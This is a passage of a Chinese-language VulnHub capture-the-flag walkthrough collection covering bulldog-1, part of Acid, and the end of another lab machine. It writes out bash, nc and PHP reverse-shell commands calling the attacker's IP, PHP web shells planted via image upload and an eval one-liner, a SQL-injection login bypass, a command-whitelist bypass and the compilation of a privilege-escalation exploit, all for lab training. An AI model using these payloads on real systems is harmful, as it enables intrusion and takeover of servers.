/></p><p>登录后是账号管理界面,账号是加勒比海盗的两位主角船长:杰克·斯帕罗和巴博萨船长。多写一句,本人更喜欢巴博萨船长,一个像敌人一样的海盗朋友,幽默、勇敢、阴险狡诈、霸道野心、老谋深算。</p><p>两个账号的头像图片地址,在之前暴破出来:<code>http://192.168.64.162/uploaded_images/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 点击add user进入添加账号界面,这是一个图片上传,思路是利用图片上传和文件包含获得shell。</p><p>查看之前test文件包含获得的panel.php源码,发现panel.php存在本地文件包含漏洞:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>下载一张<code>http://192.168.64.162/uploaded_images/</code>中的图片jack.php,文本编辑器打开,在文件中间或末尾加入一句话cmd命令马<code><?php system($_GET['cmd']); ?></code> 将文件上传成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 使用burp执行命令:
post请求url中加入执行命令的参数:<code>POST /panel.php?cmd=cat%20/etc/passwd;ls</code></p><p>post的body中包含cmd.jpg图片马:<code>load=/uploaded_images/cmd.jpg&continue=continue</code></p><p>成功执行命令<code>cat /etc/passwd;ls</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 用bash反弹shell</p><p>命令:echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash</p><p>需要将命令url编码:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在post的url中发送命令:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc接收反弹shell成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤12:找一个可写权限目录,写入菜刀马</li></ul><p>文件上传目录uploaded_images为写权限目录,进入该目录,写一个菜刀马:<code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>菜刀连接成功,方便传文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7712' class='md-header-anchor '></a>提升权限</h2><ul><li>步骤13:查看内核、系统版本,寻找提权exp</li></ul><p>(1) 查看系统内核版本,命令<code>uanme -a</code>和<code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 下载Ubuntu著名的本地提权漏洞exp:</p><p><code>https://www.exploit-db.com/exploits/37292/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤14:编译、提权</li></ul><p>(1) 赋予执行权限 </p><p><code>chmod 777 37292.c</code></p><p>(2) 编译exp</p><p><code>gcc 37292.c -o exp</code></p><p>(3) 执行exp,提权至root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7744' class='md-header-anchor '></a>思路总结</h2><h3><a name='header-n7746' class='md-header-anchor '></a>其他渗透思路</h3><p>正常的思路有3条路线可以突破。</p><p>思路1:构造注入:从test的文件包含获得index.php源码,源码中可查看到过滤sql的方法,针对性构造sql注入,登录后获取shell再提权。</p><p>(1) 审计index.php源码,发现以下过滤规则:</p><p><code>$uname=str_replace('\'','',urldecode($_POST['un']));</code></p><p><code>$pass=str_replace('\'','',urldecode($_POST['ps']));</code></p><p>str_replace的作用是将字符串\' 替换为空,因此构造SQL注入登录payload时,必须含有\'字符串,否则会报错。urldecode的作用是将输入解码。</p><p>(2) 常见的利用注入登录的payload是' or 1=1 -- 修改这个在最后增加\',str_replace会将这个\'替换为空。</p><p>使用php在线调试工具,测试如下:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 注入成功,payload是' or 1=1 -- \'</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>后面获取shell方法和上面实验相同。</p><p>思路2:暴破出phpmyadmin,文件包含从c.php获得mysql密码,登录phpmyadmin,再获取shell。</p><p>思路3:文件包含所有有权限查看的配置文件,从phpmyadmin配置文件获得root密码,然后ssh登录。该过程尽管mysql故障,也可以完成。</p><ul><li>踩到的坑</li></ul><p>(1) mysql被高线程目录暴破和注入宕机:导致phpmyadmin有正确密码但无法登录,耗费较长时间。这是意外故障。因为之前的2个工具同时目录暴破、sqlmap注入等线程过高,导致mysql死了。</p><p>(2) test.php文件包含漏洞利用,get不行,改为post试试。包含成功后,要把各个页面的源代码拿下来审计。</p><p>(3) index.php的SQL注入花费不少时间,后来发现,即使不用sql注入,也有其他道路可以完成,通过phpmyadmin登录,绕过了注入。</p><p>(4) panel.php的文件包含漏洞,如果不认真关注源码,难以发现。使用test.php的文件包含,没能触发shell利用。</p><p>(5) 文件上传+文件包含拿shell是靶机常用的方式,遇到两个漏洞,可以熟练拿shell。</p><p>(6) 提权方法可以多关注主要的配置文件、数据库连接文件、用户的文件;也可以利用Ubuntu已知漏洞本地提权。</p><h1><a name='header-n7794' class='md-header-anchor '></a>第三节 bulldog-1</h1><h2><a name='header-n7795' class='md-header-anchor '></a>靶机信息</h2><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">作者:红日安全</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">首发安全客:https://www.anquanke.com/post/id/106459</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h3><a name='header-n7797' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/bulldog/bulldog.ova' target='_blank' class='url'>https://download.vulnhub.com/bulldog/bulldog.ova</a></p><h3><a name='header-n7800' class='md-header-anchor '></a>靶机说明</h3><p>牛头犬行业最近的网站被恶意的德国牧羊犬黑客破坏。这是否意味着有更多漏洞可以利用?你为什么找不到呢?:)</p><p>这是标准的Boot-to-Root,目标是进入root目录并看到祝贺消息。</p><h3><a name='header-n7805' class='md-header-anchor '></a>目标</h3><p>获得root权限和flag。</p><h3><a name='header-n7808' class='md-header-anchor '></a>运行环境</h3><ul><li>靶机:用VirtualBox启动虚机,导入镜像,网络连接方式设置为桥接到无线网卡。靶机启动后,自动获得IP:172.20.10.7。</li><li>Windows攻击机:物理机,连接无线网卡,自动获取IP:172.20.10.5,安装有Burpsuit、nc、Python2.7、DirBuster等渗透工具。</li><li>​Kali攻击机:VMWare启动虚机,桥接到无线网卡,自动获取IP:172.20.10.6。攻击机二选一即可。</li></ul><h2><a name='header-n7819' class='md-header-anchor '></a>信息收集</h2><ul><li>ip发现</li></ul><p>靶机启动后,自动获得IP,并且显示在启动完成后的界面,IP为:172.20.10.7。无需使用Nmap扫描C段发现IP。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口和服务识别</li></ul><p>使用nmap扫描1-65535全端口,并做服务指纹识别,扫描结果保存到txt文件,命令:</p><p><code>nmap -p1-65535 -A 172.20.10.7 -oN bulldog.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>发现目标主机端口和服务如下:</p><p>端口         协议        后端服务</p><p>TCP 23      SSH        open-ssl 7.2p2</p><p>TCP 80      HTTP       WSGIServer Python 2.7.12     <br/></p><p>TCP 8080    HTTP       WSGIServer Python 2.7.12</p><p>操作系统:Linux 3.2-4.9</p><h2><a name='header-n7850' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>web漏洞思路:</li></ul><p>(1) 查看每个网页的源码,看是否有提示;</p><p>(2) 暴破目录,用DirBuster,看是否有新网页,找新网页的漏洞;</p><p>(3) 找注入或框架漏洞:如果网页有输入框、URL参数,可AWVS扫描注入;如果web使用了某些CMS框架,只能找框架的通用漏洞,通常扫描不到注入。</p><ul><li>ssh利用思路:</li></ul><p>(1) 如得到用户名,可以用就九头蛇或美杜莎暴破弱口令,但需要强大的字典且有弱口令。</p><p>(2) 如果得到web管理或系统账号,可以尝试连接ssh,如能连接上,无需反弹shell了。</p><ul><li>步骤1:浏览网页,暴破目录</li></ul><p>(1) 访问 <code>http://172.20.10.7/</code> 进入首页:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><p>首页有链接,点击进入notice页面,未发现有价值的信息。</p><p>(2) 使用DirBuster暴破目录,得到dev和admin目录:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 访问<code>http://172.20.10.7/admin</code>,这是一个Django管理后台,需要用户名、密码登录,试了下没有常见弱口令,先不尝试暴破,去看看其他页面。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) 访问<code>http://172.20.10.7/dev</code>,该页面的有价值信息非常多,主要信息:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><p>新系统不在使用php或任何CMS,而是使用Django框架开发。这意味着不太可能再找到网页的注入漏洞,只能找Django框架漏洞;网站不使用php,无需再找php漏洞或者写php木马;</p><p>新系统使用webshell管理,有一个Web-shell链接,点击可访问<code>http://172.20.10.7/dev/shell/</code>,但是需要认证。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤2:破解hash</li></ul><p>(1) 查看<code>http://172.20.10.7/dev</code>页面源码,会发现有每个Team Lead的邮箱和hash:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>并且有明显的英文提示:We'll remove these in prod. It's not like a hacker can do anything with a hash。</p><p>(2) hash长度为40位,可以看出是sha1,即使不知道是哪种hash,也可以把每个hash值,到CMD5尝试碰撞解密:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 最终解密出2个hash值:</p><p>Back End: <a href='mailto:nick@bulldogindustries.com' target='_blank' class='url'>nick@bulldogindustries.com</a></p><p>用户名:nick,密码:bulldog (CMD5可免费解密出来)</p><p>Database: <a href='mailto:sarah@bulldogindustries.com' target='_blank' class='url'>sarah@bulldogindustries.com</a></p><p>用户名:sarah,密码:bulldoglover (CMD5需要收费解密出来)</p><ul><li>步骤3:登录后台</li></ul><p>(1) 使用解密出来的密码尝试登录扫描出来的23端口ssh都失败:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) 使用sarah、密码bulldoglover成功登录管理后台,发现没有编辑权限。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 再去访问webshell页面,已通过认证,可执行命令,这是一个命令执行界面:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7938' class='md-header-anchor '></a>获取shell</h2><ul><li>步骤4:绕过白名单限制,执行系统命令: </li></ul><p>webshell页面只能执行白名单的命令,尝试用;或者&&连接,执行多个命令:</p><p>ls是白名单命令,id是禁止命令,通过<code>ls && id</code>可成功执行id命令,达到绕过白名单限制执行命令。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤5:反弹shell: </li></ul><p>(1) Windows攻击机开启nc监听:<code>nc -lvnp 4444</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) 直接执行<code>ls && bash -i >& /dev/tcp/172.20.10.5/4444 0>&1</code>失败,server报错500。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 尝试多次bash反弹,最后使用echo命令先输出命令,再输入到bash,反弹shell成功:</p><p><code>echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7969' class='md-header-anchor '></a>提升权限</h2><ul><li>步骤6:查看有哪些系统用户 <code>cat /etc/passwd</code>, 发现需要关注的用户有:bulldogadmin、django</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤7:查找每个用户的文件(不显示错误) <code>find / -user bulldogadmin 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><p>(1) 发现值得关注的文件有:一个是note,一个是customPermissionApp。</p><p>/home/bulldogadmin/.hiddenadmindirectory/note</p><p>/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</p><p>(2) 打开note文本文件:发现提示webserver有时需要root权限访问。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 打开customPermissionApp,看上去是可执行文件,使用strings打印其中的可打印字符:</p><p><code>strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><p>note文件中提示执行该文件,可以获得root权限,但通过ls查看文件权限只有读权限,并无法执行。</p><ul><li>步骤8:拼接root密码提权</li></ul><p>(1) 观察文件中只有这些字符,疑似可能与密码相关,英文单词包括:SUPER、 ulitimate、PASSWORD、youCANTget,这些都与最高权限账号相关,推测这是一个解谜题目:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>最直接的组合是去掉H,变成一句通顺的英文句子:SUPERultimatePASSWORDyouCANTget</p><p>(2) su命令无法执行,提示:must be run from a terminal,上次Vulhub已经遇到过该问题,通过一句Python解决:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>(3) 执行<code>sudo su -</code>,获得root权限,获取flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) 如果不解决无法su,还记得有23端口的ssh,也可以使用Xshell通过ssh登录,登录成功后执行sudo su - 提权并获得flag</p><p>用户名:<code>django</code></p><p>密码:<code>SUPERultimatePASSWORDyouCANTget</code>   不用猜测的密码,改了django再登录也可以。</p><p>sudo su提权,密码是:<code>SUPERultimatePASSWORDyouCANTget</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n8033' class='md-header-anchor '></a>靶场思路回顾</h2><p>1.目录暴破出dev和admin页面:</p><p>(1) 可暴破出dev页面,该页面源码里面有多个账号的用户名、邮箱、密码sha1值。该页面还链接到webshell命令执行页面。</p><p>(2) 可暴破出admin后台页面,登录密码通过dev页面破解sha1得到。</p><p>2.绕过白名单限制,执行命令和反弹shell:绕过限制执行命令比较容易。反弹shell尝试多次使用bash反弹shell后成功,没有尝试py shell。</p><p>3.搜索系统中id为1000以后的用户的文件,可以找到隐藏文件。</p><p>4.猜解root密码很艰难。</p><h2><a name='header-n8046' class='md-header-anchor '></a>思路总结</h2><h3><a name='header-n8047' class='md-header-anchor '></a>难点和踩到的坑</h3><p>(1) 发现和破解sha1:在dev页面查看源码,发现多个用户hash后,即使不知道是40位的sha1,也可以直接去cmd5破解,系统会自动识别,可以破解出2个账号。如果用hashcat暴破sha1,需要强大的字段和较长的时间。</p><p>(2) 反弹shell应该有多种方法:第一个想到的是bash shell,也想到了python反弹shell。只尝试了通过bash反弹shell,如果bash反弹不成功,可尝试往系统echo文件,赋予+x执行权限,执行脚本反弹。也可尝试Python是否能够反弹shell。</p><p>(3) 发现隐藏的包含root密码的文件,通过搜索id为1000之后的用户文件,查看历史命令,或者查看目录,也可能找到。</p><p>(4) 猜解root密码:这个是最难的,找到这个文件并不难,但是通过strings查看文件内容,并且拼接字符串为root密码,感觉难度很大。</p><h1><a name='header-n8056' class='md-header-anchor '></a>第四节 Acid</h1><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">作者:红日安全</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">首发安全客:https://www.anquanke.com/post/id/10546</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h2><a name='header-n8058' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n8059' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/acid/Acid.rar' target='_blank' class='url'>https://download.vulnhub.com/acid/Acid.rar</a></p><h3><a name='header-n8062' class='md-header-anchor '></a>靶机说明</h3><p>Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.</p><p>欢迎来到Acid的世界。童话故事需要使用秘密钥匙打开魔法门。</p><h3><a name='header-n8068' class='md-header-anchor '></a>目标</h3><p>获得root权限和flag。</p><h3><a name='header-n8071' class='md-header-anchor '></a>运行环境</h3><ul><li>靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动获取IP。</li><li>攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工具。</li><li>​</li></ul><h2><a name='header-n8082' class='md-header-anchor '></a>信息收集</h2><ul><li>ip发现</li></ul><p>启用Acid虚拟机,由于网络设置为net模式,使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段,即可找到虚机IP,扫描结果保存到txt文件,命令:</p><p><code>nmap -sP 192.168.64.0/24 -oN acid-ip.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><p>获得目标ip <code>192.168.64.153</code></p><ul><li>端口扫描</li></ul><p>使用nmap扫描1-65535全端口,并做服务指纹识别,扫描结果保存到txt文件,命令:</p><p><code>nmap -p1-65535 -sV -oN acid-port.txt 192.168.64.153</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>目标主机的33447端口发现web服务,web服务器是Apache2.4.10,操作系统ubuntu。</p><p><code>http://192.168.64.153:33447</code> 进入主页:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>服务识别</li></ul><p>只发现web服务和Apache,只能从web漏洞或者Apache漏洞入手(如有漏洞):</p><p>端口:Tcp 33447</p><p>底层服务:Apache2.4.10</p><p>操作系统:Ubuntu</p><h2><a name='header-n8124' class='md-header-anchor '></a>漏洞挖掘的详细思路</h2><ul><li>web挖掘思路:</li></ul><p>(1) 查看每个网页的源码,看是否有提示;</p><p>(2) 暴破目录,用御剑或DirBuster,看是否有新网页,找新网页的漏洞;</p><ul><li>Apache挖掘思路:</li></ul><p>(1) 寻找Apache2.4.10有无已知漏洞可利用:没有发现可直接利用的漏洞。</p><p>(2) 到<a href='http://www.exploit-db.com' target='_blank' class='url'>www.exploit-db.com</a>查询有无exp:没有找到exp。</p><p>(3) Nessus扫描一下主机漏洞:没有扫描出漏洞。</p><ul><li>实在找不到漏洞:单用户模式进入Ubuntu,看源码吧。</li></ul><ul><li>步骤1:首先看主页源码,发现提示:0x643239334c6d70775a773d3d</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>0x是16进制编码,将值643239334c6d70775a773d3d进行ASCII hex转码,变成:d293LmpwZw==</p><p>发现是base64编码,再进行解码,得到图片信息 wow.jpg</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>这时可以根据经验在首页直接加目录打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 网站的图片目录通常是这样命名。也可以利用dirbuster进行目录爆破,得到图片目录images。</p><ul><li>访问 <code>http://192.168.64.153:33447/images/wow.jpg</code> 得到图片:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>将图片保存到本地,用Notepad++打开,发现最下边有提示</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><p>将3761656530663664353838656439393035656533376631366137633631306434进行ASCII hex转码,得到 7aee0f6d588ed9905ee37f16a7c610d4,这是一串md5。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>去cmd5解密,得到63425,推测是一个密码或者ID。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤2:使用Dirbuster进行目录暴破:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>查看暴破结果:发现challenge目录,该目录下有cake.php、include.php、hacked.php,用Burpsuit挂上代理,使用Firefox然后依次访问3个文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤3:访问cake.php,发现需要登录后才能访问:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><p>该页面如果看页面title或者看burpsuit的Response返回值的<title>/Magic_Box</title>,会发现有/Magic_Box目录存在,先看其他页面。</p><p>点击login会跳转到index.php登录页面,需要email和密码才能登录:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤4:访问include.php,这是一个文件包含漏洞页面:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>在输入框中输入 /etc/passwd 测试存在文件包含,Burpsuit显示response包如下:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>想文件包含拿shell,但没有文件上传点,之前发现的wow.jpg中无木马可包含。先继续看hacked.php。</p><ul><li>步骤5:访问cake.php,需要输入ID,测试下之前从wow.jpg解密出来的数字:63425</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><p>然后,什么也没有发生,看来ID不对,或者需要先通过index页面输入email和密码登录。</p><ul><li>步骤6:找注入,把发现的几个页面都送入AWVS扫描了漏洞,未发现注入。</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤7:继续暴破发现的Magic_Box目录:发现low.php,command.php</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步骤8:访问low.php是个空页面,访问command.php,发现命令执行界面:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>可执行系统命令,输入192.168.64.1;id 查看burpsuit的response发现id命令执行成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n8247' class='md-header-anchor '></a>获取shell</h2><ul><li>步骤9:利用php反弹shell。Windows开启nc,监听4444端口:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>为避免转义和中断,在get、post请求中输入payload需要进行url编码。尝试bash反弹shell、nc反弹shell,如下payload都失败:</p><p><code>bash -i >& /dev/tcp/192.168.64.1/4444 0>&1</code></p><p><code>nc -e /bin/bash  -d 192.168.64.1 4444</code></p><p>通过php反弹shell成功,将如下payload进行URL编码后,在burp中发送:</p><p><code>php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p>nc成功接收反弹shelll:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>但是无法执行su命令,回显su: must be run from a terminal 需要一个终端。没有想出办法,最终google了一下,找到答案:用python调用本地的shell,命令:</p><p><code>echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py</code></p><p><code>python 